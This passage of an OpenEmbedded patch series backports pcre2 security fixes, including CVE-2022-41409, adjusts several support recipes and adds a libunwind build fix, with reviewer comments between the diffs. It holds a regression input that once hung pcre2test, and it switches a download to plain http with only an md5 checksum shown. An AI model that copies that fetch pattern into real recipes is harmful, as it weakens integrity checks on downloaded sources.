653 { MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
654+ { MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
655
656 /* 16 bit specific tests. */
657 { CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
658--
6592.25.1
660
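Review bot: The added line `LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);` in the hunk at `@@ -13304,6 +13373,7 @@` is missing its leading `S`: every other assertion this patch adds is spelled `SLJIT_ASSERT`, and nothing visible here defines `LJIT_ASSERT`. Where the JIT source is compiled this is a call to an undeclared function, so I would expect a build or link failure; the line should read `SLJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);`. The `SLJIT_ASSERT(recurse_check_bit(...))` lines also put a call that sets a bit in `recurse_bitset` inside an assertion, so the second slot of each pair is presumably marked only in builds where assertions are compiled in; a one-line comment saying that this is intended would help. The doubled `;;` after the `SLJIT_MALLOC` for `recurse_bitset` and the whitespace-only change to the `private_data_ptrs` cast are noise in a security backport.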
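--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
+From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
+From: Philip Hazel <Philip.Hazel@gmail.com>
+Date: Tue, 16 Aug 2022 17:00:45 +0100
+Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
+
+CVE: CVE-2022-41409
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ ChangeLog | 3 +++
+ src/pcre2test.c | 4 ++--
+ testdata/testinput2 | 3 +++
+ testdata/testoutput2 | 4 ++++
+ 4 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index eab50eb7..276eb57a 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -7,6 +7,9 @@ fully read in caseless matching.
+ 24. Fixed an issue affecting recursions in JIT caused by duplicated data
+ transfers.
+
++20. A negative repeat value in a pcre2test subject line was not being
++diagnosed, leading to infinite looping.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2test.c b/src/pcre2test.c
+index 08f86096..f6f5d66c 100644
+--- a/src/pcre2test.c
++++ b/src/pcre2test.c
+@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
+ }
+
+ i = (int32_t)li;
+- if (i-- == 0)
++ if (i-- <= 0)
+ {
+- fprintf(outfile, "** Zero repeat not allowed\n");
++ fprintf(outfile, "** Zero or negative repeat not allowed\n");
+ return PR_OK;
+ }
+
+diff --git a/testdata/testinput2 b/testdata/testinput2
+index 655e519..14e00ed 100644
+--- a/testdata/testinput2
++++ b/testdata/testinput2
+@@ -5772,4 +5772,7 @@ a)"xI
+ /(a)?a/I
+ manm
+
++--
++ \[X]{-10}
++
+ # End of testinput2
+diff --git a/testdata/testoutput2 b/testdata/testoutput2
+index c733c12..958f246 100644
+--- a/testdata/testoutput2
++++ b/testdata/testoutput2
+@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
+ manm
+ 0: a
+
++--
++ \[X]{-10}
++** Zero or negative repeat not allowed
++
+ # End of testinput2
+ Error -70: PCRE2_ERROR_BADDATA (unknown error number)
+ Error -62: bad serialized data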
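Review bot: The rewritten test `if (i-- <= 0)` in `src/pcre2test.c` still decrements inside the condition, so a rejected value is decremented before the early return; if `INT32_MIN` can reach this line (any range check on `li` lies above the hunk) that decrement is a signed overflow. Splitting the two steps, `if (i <= 0) { ... return PR_OK; }` followed by `i--;`, keeps the diagnostic and takes the side effect out of the comparison. The diffstat shows the change is confined to `src/pcre2test.c` and its test data, so the patch header could say that the library code is not touched. The enclosing `while ((c = *p++) != 0)` loop continues outside the hunk.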
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
10LICENSE = "BSD-3-Clause" 10LICENSE = "BSD-3-Clause"
11LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37" 11LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
12 12
13SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \ 13SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
14 file://pcre-cross.patch \ 14 file://pcre-cross.patch \
15 file://CVE-2022-1586.patch \
16 file://CVE-2022-1586-regression.patch \
17 file://CVE-2022-1587.patch \
18 file://CVE-2022-41409.patch \
15" 19"
16 20
17SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366" 21SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
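Review bot: The new SRC_URI fetches the tarball from `http://downloads.yoctoproject.org/mirror/sources/` where the old one used https, so the integrity of the download now rests entirely on the recipe checksums. Only `SRC_URI[md5sum]` is visible in this section; please confirm a `SRC_URI[sha256sum]` follows it, since MD5 alone is not collision-resistant, and use the `https://` form of the mirror URL if the host serves it. A short comment above SRC_URI saying why the ftp.pcre.org location was dropped would help whoever next bumps the version.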
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
7SECTION = "devel" 7SECTION = "devel"
8LICENSE = "BSD-3-Clause" 8LICENSE = "BSD-3-Clause"
9LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e" 9LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
10SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \ 10SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
11 file://fix-pcre-name-collision.patch \
12 file://run-ptest \ 11 file://run-ptest \
13 file://Makefile \ 12 file://Makefile \
14 " 13 "
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Library providing automatic proxy configuration management" 1SUMMARY = "Library providing automatic proxy configuration management"
2DESCRIPTION = "libproxy provides interfaces to get the proxy that will be \
3used to access network resources. It uses various plugins to get proxy \
4configuration via different mechanisms (e.g. environment variables or \
5desktop settings)."
2HOMEPAGE = "https://github.com/libproxy/libproxy" 6HOMEPAGE = "https://github.com/libproxy/libproxy"
3BUGTRACKER = "https://github.com/libproxy/libproxy/issues" 7BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
4SECTION = "libs" 8SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
1SUMMARY = "Public Suffix List library" 1SUMMARY = "Public Suffix List library"
2DESCRIPTION = "The libpsl package provides a library for accessing and \
3resolving information from the Public Suffix List (PSL). The PSL is a set of \
4domain names beyond the standard suffixes, such as .com."
5
6HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
7BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
2 8
3LICENSE = "MIT" 9LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \ 10LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
13 19
14UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases" 20UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
15 21
16DEPENDS = "libidn2"
17
18inherit autotools gettext gtk-doc manpages pkgconfig lib_package 22inherit autotools gettext gtk-doc manpages pkgconfig lib_package
19 23
20PACKAGECONFIG ??= "" 24PACKAGECONFIG ?= "idn2"
21PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native" 25PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
22 26PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
27PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
23BBCLASSEXTEND = "native nativesdk" 28BBCLASSEXTEND = "native nativesdk"
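Review bot: The new `PACKAGECONFIG[icu]` and `PACKAGECONFIG[idn2]` entries both leave the second (disabled) field empty and both pass `--enable-runtime=`/`--enable-builtin=`, so nothing states what happens when neither or both are selected. With neither, configure gets no explicit choice and will presumably use whatever it detects in the sysroot; with both, two conflicting values are passed. I would add a comment above them such as `# icu and idn2 are mutually exclusive; select exactly one`, and consider filling the disabled field so the result does not depend on detection.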
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index f984a06aba..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
1SUMMARY = "An HTTP library implementation in C" 1SUMMARY = "An HTTP library implementation in C"
2DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
3and the glib main loop, to integrate well with GNOME applications."
2HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup" 4HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
3BUGTRACKER = "https://bugzilla.gnome.org/" 5BUGTRACKER = "https://bugzilla.gnome.org/"
4SECTION = "x11/gnome/libs" 6SECTION = "x11/gnome/libs"
5LICENSE = "LGPLv2" 7LICENSE = "LGPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" 8LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
7 9
8DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl" 10DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
9 11
10SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}" 12SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
11 13
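--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
  file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
  file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
  "
+DEPENDS = "gperf-native"
 
 SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
  file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \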
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
1From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
2From: Yichao Yu <yyc1992@gmail.com>
3Date: Tue, 31 Mar 2020 00:43:32 -0400
4Subject: [PATCH] Fix compilation with -fno-common.
5
6[Khem Raj]
7Making all other archs consistent with IA64 which should not have this problem.
8Also move the FIXME to the correct place.
9
10Also add some minimum comments about this...
11
12[Philippe Coval]
13
14Patch ported to v1.3-stable branch,
15patch to be used used in openembedded-core dunfell branch (on v1.3.1)
16for oniro project.
17
18Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
19Signed-off-by: Khem Raj <raj.khem@gmail.com>
20Thanks-to: Yichao Yu <yyc1992@gmail.com>
21Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
22Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
23Forwarded: https://github.com/libunwind/libunwind/pull/312
24Last-Update: 2021-11-25
25Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
26---
27 src/aarch64/Ginit.c | 15 +++++++--------
28 src/arm/Ginit.c | 15 +++++++--------
29 src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++
30 src/hppa/Ginit.c | 15 +++++++--------
31 src/ia64/Ginit.c | 1 +
32 src/mi/Gfind_dynamic_proc_info.c | 1 +
33 src/mips/Ginit.c | 15 +++++++--------
34 src/ppc32/Ginit.c | 11 +++++++----
35 src/ppc64/Ginit.c | 11 +++++++----
36 src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++
37 src/sh/Ginit.c | 15 +++++++--------
38 src/tilegx/Ginit.c | 15 +++++++--------
39 src/x86/Ginit.c | 15 +++++++--------
40 src/x86_64/Ginit.c | 15 +++++++--------
41 14 files changed, 82 insertions(+), 72 deletions(-)
42
43diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
44index 9c4eae82..cb954b15 100644
45--- a/src/aarch64/Ginit.c
46+++ b/src/aarch64/Ginit.c
47@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
48
49 # endif /* UNW_LOCAL_ONLY */
50
51-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
52-
53-/* XXX fix me: there is currently no way to locate the dyn-info list
54- by a remote unwinder. On ia64, this is done via a special
55- unwind-table entry. Perhaps something similar can be done with
56- DWARF2 unwind info. */
57-
58 static void
59 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
60 {
61@@ -78,7 +71,13 @@ static int
62 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
63 void *arg)
64 {
65- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
66+#ifndef UNW_LOCAL_ONLY
67+# pragma weak _U_dyn_info_list_addr
68+ if (!_U_dyn_info_list_addr)
69+ return -UNW_ENOINFO;
70+#endif
71+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
72+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
73 return 0;
74 }
75
76diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
77index 2720d063..0bac0d72 100644
78--- a/src/arm/Ginit.c
79+++ b/src/arm/Ginit.c
80@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
81
82 # endif /* UNW_LOCAL_ONLY */
83
84-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
85-
86-/* XXX fix me: there is currently no way to locate the dyn-info list
87- by a remote unwinder. On ia64, this is done via a special
88- unwind-table entry. Perhaps something similar can be done with
89- DWARF2 unwind info. */
90-
91 static int
92 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
93 void *arg)
94 {
95- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
96+#ifndef UNW_LOCAL_ONLY
97+# pragma weak _U_dyn_info_list_addr
98+ if (!_U_dyn_info_list_addr)
99+ return -UNW_ENOINFO;
100+#endif
101+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
102+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
103 return 0;
104 }
105
106diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
107index 0d119055..739ed056 100644
108--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
109+++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
110@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
111
112 #else
113
114+/* XXX fix me: there is currently no way to locate the dyn-info list
115+ by a remote unwinder. On ia64, this is done via a special
116+ unwind-table entry. Perhaps something similar can be done with
117+ DWARF2 unwind info. */
118+
119 static inline int
120 get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
121 int *countp)
122diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
123index 461e4b93..265455a6 100644
124--- a/src/hppa/Ginit.c
125+++ b/src/hppa/Ginit.c
126@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
127
128 # endif /* UNW_LOCAL_ONLY */
129
130-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
131-
132-/* XXX fix me: there is currently no way to locate the dyn-info list
133- by a remote unwinder. On ia64, this is done via a special
134- unwind-table entry. Perhaps something similar can be done with
135- DWARF2 unwind info. */
136-
137 static void
138 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
139 {
140@@ -81,7 +74,13 @@ static int
141 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
142 void *arg)
143 {
144- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
145+#ifndef UNW_LOCAL_ONLY
146+# pragma weak _U_dyn_info_list_addr
147+ if (!_U_dyn_info_list_addr)
148+ return -UNW_ENOINFO;
149+#endif
150+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
151+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
152 return 0;
153 }
154
155diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
156index b09a2ad5..8601bb3c 100644
157--- a/src/ia64/Ginit.c
158+++ b/src/ia64/Ginit.c
159@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
160 if (!_U_dyn_info_list_addr)
161 return -UNW_ENOINFO;
162 #endif
163+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
164 *dyn_info_list_addr = _U_dyn_info_list_addr ();
165 return 0;
166 }
167diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
168index 98d35012..2e7c62e5 100644
169--- a/src/mi/Gfind_dynamic_proc_info.c
170+++ b/src/mi/Gfind_dynamic_proc_info.c
171@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
172 return -UNW_ENOINFO;
173 #endif
174
175+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
176 list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
177 for (di = list->first; di; di = di->next)
178 if (ip >= di->start_ip && ip < di->end_ip)
179diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
180index 3df170c7..bf7a8f5a 100644
181--- a/src/mips/Ginit.c
182+++ b/src/mips/Ginit.c
183@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
184
185 # endif /* UNW_LOCAL_ONLY */
186
187-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
188-
189-/* XXX fix me: there is currently no way to locate the dyn-info list
190- by a remote unwinder. On ia64, this is done via a special
191- unwind-table entry. Perhaps something similar can be done with
192- DWARF2 unwind info. */
193-
194 static void
195 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
196 {
197@@ -86,7 +79,13 @@ static int
198 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
199 void *arg)
200 {
201- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
202+#ifndef UNW_LOCAL_ONLY
203+# pragma weak _U_dyn_info_list_addr
204+ if (!_U_dyn_info_list_addr)
205+ return -UNW_ENOINFO;
206+#endif
207+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
208+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
209 return 0;
210 }
211
212diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
213index ba302448..7b454558 100644
214--- a/src/ppc32/Ginit.c
215+++ b/src/ppc32/Ginit.c
216@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
217
218 # endif /* UNW_LOCAL_ONLY */
219
220-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
221-
222-
223 static void
224 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
225 {
226@@ -104,7 +101,13 @@ static int
227 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
228 void *arg)
229 {
230- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
231+#ifndef UNW_LOCAL_ONLY
232+# pragma weak _U_dyn_info_list_addr
233+ if (!_U_dyn_info_list_addr)
234+ return -UNW_ENOINFO;
235+#endif
236+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
237+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
238 return 0;
239 }
240
241diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
242index 4c88cd6e..7bfb395a 100644
243--- a/src/ppc64/Ginit.c
244+++ b/src/ppc64/Ginit.c
245@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
246
247 # endif /* UNW_LOCAL_ONLY */
248
249-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
250-
251-
252 static void
253 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
254 {
255@@ -108,7 +105,13 @@ static int
256 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
257 void *arg)
258 {
259- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
260+#ifndef UNW_LOCAL_ONLY
261+# pragma weak _U_dyn_info_list_addr
262+ if (!_U_dyn_info_list_addr)
263+ return -UNW_ENOINFO;
264+#endif
265+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
266+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
267 return 0;
268 }
269
270diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
271index cc5ed044..16671d45 100644
272--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
273+++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
274@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
275
276 #else
277
278+/* XXX fix me: there is currently no way to locate the dyn-info list
279+ by a remote unwinder. On ia64, this is done via a special
280+ unwind-table entry. Perhaps something similar can be done with
281+ DWARF2 unwind info. */
282+
283 static inline int
284 get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
285 int *countp)
286diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
287index 52988a72..9fe96d2b 100644
288--- a/src/sh/Ginit.c
289+++ b/src/sh/Ginit.c
290@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
291
292 # endif /* UNW_LOCAL_ONLY */
293
294-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
295-
296-/* XXX fix me: there is currently no way to locate the dyn-info list
297- by a remote unwinder. On ia64, this is done via a special
298- unwind-table entry. Perhaps something similar can be done with
299- DWARF2 unwind info. */
300-
301 static void
302 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
303 {
304@@ -75,7 +68,13 @@ static int
305 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
306 void *arg)
307 {
308- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
309+#ifndef UNW_LOCAL_ONLY
310+# pragma weak _U_dyn_info_list_addr
311+ if (!_U_dyn_info_list_addr)
312+ return -UNW_ENOINFO;
313+#endif
314+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
315+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
316 return 0;
317 }
318
319diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
320index 7564a558..925e6413 100644
321--- a/src/tilegx/Ginit.c
322+++ b/src/tilegx/Ginit.c
323@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
324
325 # endif /* UNW_LOCAL_ONLY */
326
327-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
328-
329-/* XXX fix me: there is currently no way to locate the dyn-info list
330- by a remote unwinder. On ia64, this is done via a special
331- unwind-table entry. Perhaps something similar can be done with
332- DWARF2 unwind info. */
333-
334 static void
335 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
336 {
337@@ -81,7 +74,13 @@ static int
338 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
339 void *arg)
340 {
341- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
342+#ifndef UNW_LOCAL_ONLY
343+# pragma weak _U_dyn_info_list_addr
344+ if (!_U_dyn_info_list_addr)
345+ return -UNW_ENOINFO;
346+#endif
347+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
348+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
349 return 0;
350 }
351
352diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
353index f6b8dc27..3cec74a2 100644
354--- a/src/x86/Ginit.c
355+++ b/src/x86/Ginit.c
356@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
357
358 # endif /* UNW_LOCAL_ONLY */
359
360-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
361-
362-/* XXX fix me: there is currently no way to locate the dyn-info list
363- by a remote unwinder. On ia64, this is done via a special
364- unwind-table entry. Perhaps something similar can be done with
365- DWARF2 unwind info. */
366-
367 static void
368 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
369 {
370@@ -71,7 +64,13 @@ static int
371 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
372 void *arg)
373 {
374- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
375+#ifndef UNW_LOCAL_ONLY
376+# pragma weak _U_dyn_info_list_addr
377+ if (!_U_dyn_info_list_addr)
378+ return -UNW_ENOINFO;
379+#endif
380+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
381+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
382 return 0;
383 }
384
385diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
386index b7e8e462..fe6bcc33 100644
387--- a/src/x86_64/Ginit.c
388+++ b/src/x86_64/Ginit.c
389@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
390
391 unw_addr_space_t unw_local_addr_space = &local_addr_space;
392
393-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
394-
395-/* XXX fix me: there is currently no way to locate the dyn-info list
396- by a remote unwinder. On ia64, this is done via a special
397- unwind-table entry. Perhaps something similar can be done with
398- DWARF2 unwind info. */
399-
400 static void
401 put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
402 {
403@@ -66,7 +59,13 @@ static int
404 get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
405 void *arg)
406 {
407- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
408+#ifndef UNW_LOCAL_ONLY
409+# pragma weak _U_dyn_info_list_addr
410+ if (!_U_dyn_info_list_addr)
411+ return -UNW_ENOINFO;
412+#endif
413+ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
414+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
415 return 0;
416 }
417
418--
4192.32.0
420
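Review bot: The patch header gives three different upstream references for one change: `Upstream-Status: Backport` cites pull/166, `Origin:` cites commit 29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e, and the `From` line carries 51112447b316813ad1ae50ea66feca4eb755a424, so a reader cannot tell which upstream object the 14 file diffs were checked against. Because the header says this is a port to the v1.3-stable branch rather than a verbatim cherry-pick, I would put the merged commit in the bracket, `Upstream-Status: Backport [https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e]`, and keep the pull-request links in the body text. Separately, every arch `Ginit.c` drops its `HIDDEN unw_dyn_info_list_t _U_dyn_info_list;` and none of the 14 files adds a definition, so it is worth confirming that the 1.3.1 tree already provides the single definition behind `_U_dyn_info_list_addr ()` for each target built here.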
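--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
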